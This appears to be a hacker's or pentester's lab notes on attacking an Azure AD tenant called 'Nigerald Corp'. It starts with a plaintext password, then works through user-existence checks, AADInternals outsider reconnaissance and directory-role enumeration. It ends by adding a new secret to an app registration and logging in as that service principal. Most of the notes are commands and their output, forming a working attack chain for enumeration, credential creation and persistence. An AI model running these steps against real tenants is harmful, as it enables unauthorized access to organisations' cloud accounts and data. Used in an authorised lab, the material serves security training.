Starting point
password = "QTYQedP$2$o2OnH5"
username = "[email protected]"
The user exists
<https://login.microsoftonline.com/[email protected]&xml=1>
<RealmInfo Success="true">
<State>4</State>
<UserState>1</UserState>
<Login>[email protected]</Login>
<NameSpaceType>Managed</NameSpaceType>
<DomainName>nigeraldcorp.onmicrosoft.com</DomainName>
<IsFederatedNS>false</IsFederatedNS>
<FederationBrandName>Nigerald Corp</FederationBrandName>
<CloudInstanceName>microsoftonline.com</CloudInstanceName>
<CloudInstanceIssuerUri>urn:federation:MicrosoftOnline</CloudInstanceIssuerUri>
</RealmInfo>
AADInternals
import-module .\\AADInternals\\AADInternals.psd1
PS C:\\Users\\Dylan\\Desktop\\tools> Invoke-AADIntReconAsOutsider -domainname nigeraldcorp.onmicrosoft.com
Tenant brand: Nigerald Corp
Tenant name: nigeraldcorp.onmicrosoft.com
Tenant id: 5639a4aa-e0d0-4225-abe7-84d168892466
Tenant region: NA
DesktopSSO enabled: False
Name : nigeraldcorp.onmicrosoft.com
DNS : False
MX : False
SPF : False
DMARC :
DKIM : False
MTA-STS : False
Type : Managed
STS :
PS C:\\Users\\Dylan\\Desktop\\tools> connect-azuread
Account Environment TenantId TenantDomain AccountType
------- ----------- -------- ------------ -----------
[email protected] AzureCloud 5639a4aa-e0d0-4225-abe7-84d168892466 nigeraldcorp.onmicrosoft.com User
PS C:\\Users\\Dylan\\Desktop\\tools> Get-AzureADCurrentSessionInfo
Account Environment TenantId TenantDomain AccountType
------- ----------- -------- ------------ -----------
[email protected] AzureCloud 5639a4aa-e0d0-4225-abe7-84d168892466 nigeraldcorp.onmicrosoft.com User
PS C:\\Users\\Dylan\\Desktop\\tools> get-azureadtenantdetail
ObjectId DisplayName VerifiedDomain
-------- ----------- --------------
5639a4aa-e0d0-4225-abe7-84d168892466 Nigerald Corp nigeraldcorp.onmicrosoft.com
PS C:\\Users\\Dylan\\Desktop\\tools> Get-AzureADDirectoryRole
ObjectId DisplayName Description
-------- ----------- -----------
0e03b64a-588c-4837-b303-f41d6de28be8 Application Administrator Can create and manage all aspects of app registrations and enterprise apps.
61e6e457-e0b0-4a97-8cc2-7db3a4ff5ad8 Global Administrator Can manage all aspects of Microsoft Entra ID and Microsoft services that use Microsoft Entra identities.
PS C:\\Users\\Dylan\\Desktop\\tools> Get-AzureADDirectoryRoleMember -objectid 0e03b64a-588c-4837-b303-f41d6de28be8
ObjectId DisplayName UserPrincipalName UserType
-------- ----------- ----------------- --------
487b7998-64f1-4f8e-9e1e-dcb27e39c8f0 chris.green [email protected] Member
A loop to do things better
$roles = Get-AzureADDirectoryRole
ForEach($role in $roles){
Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId | select @{n="Azure role";e={$role.DisplayName}}, displayname
}
Azure role DisplayName
---------- -----------
Application Administrator chris.green
Global Administrator Dylan Tran
PS C:\\Users\\Dylan\\Desktop\\tools> Get-AzureADApplication
ObjectId AppId DisplayName
-------- ----- -----------
b0583e65-6412-4f63-a433-d84174cb5e01 ad61a599-93cc-44e8-9f00-8a915635ee2a NigeraldCorp-App
PS C:\\Users\\Dylan\\Desktop\\tools> new-azureadapplicationpasswordcredential -objectid b0583e65-6412-4f63-a433-d84174cb5e01
CustomKeyIdentifier :
EndDate : 12/21/2024 6:28:22 PM
KeyId :
StartDate : 12/21/2023 6:28:22 PM
Value : 4mlV5RAnaQXrA6acNRlEa2b/O7Yfk6iJ5syRdaYCMoU=
PS C:\\Users\\Dylan\\Desktop\\tools> $pass = convertto-securestring -asplaintext -force '4mlV5RAnaQXrA6acNRlEa2b/O7Yfk6iJ5syRdaYCMoU='
PS C:\\Users\\Dylan\\Desktop\\tools> $creds = new-object -typename system.management.automation.pscredential -argumentlist ad61a599-93cc-44e8-9f00-8a915635ee2a, $pass
PS C:\\Users\\Dylan\\Desktop\\tools> connect-azaccount -serviceprincipal -credential $creds -tenant 5639a4aa-e0d0-4225-abe7-84d168892466
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
ad61a599-93cc-44e8-9f00-8a915635ee2a Azure subscription 1 5639a4aa-e0d0-4225-abe7-84d168892466 AzureCloud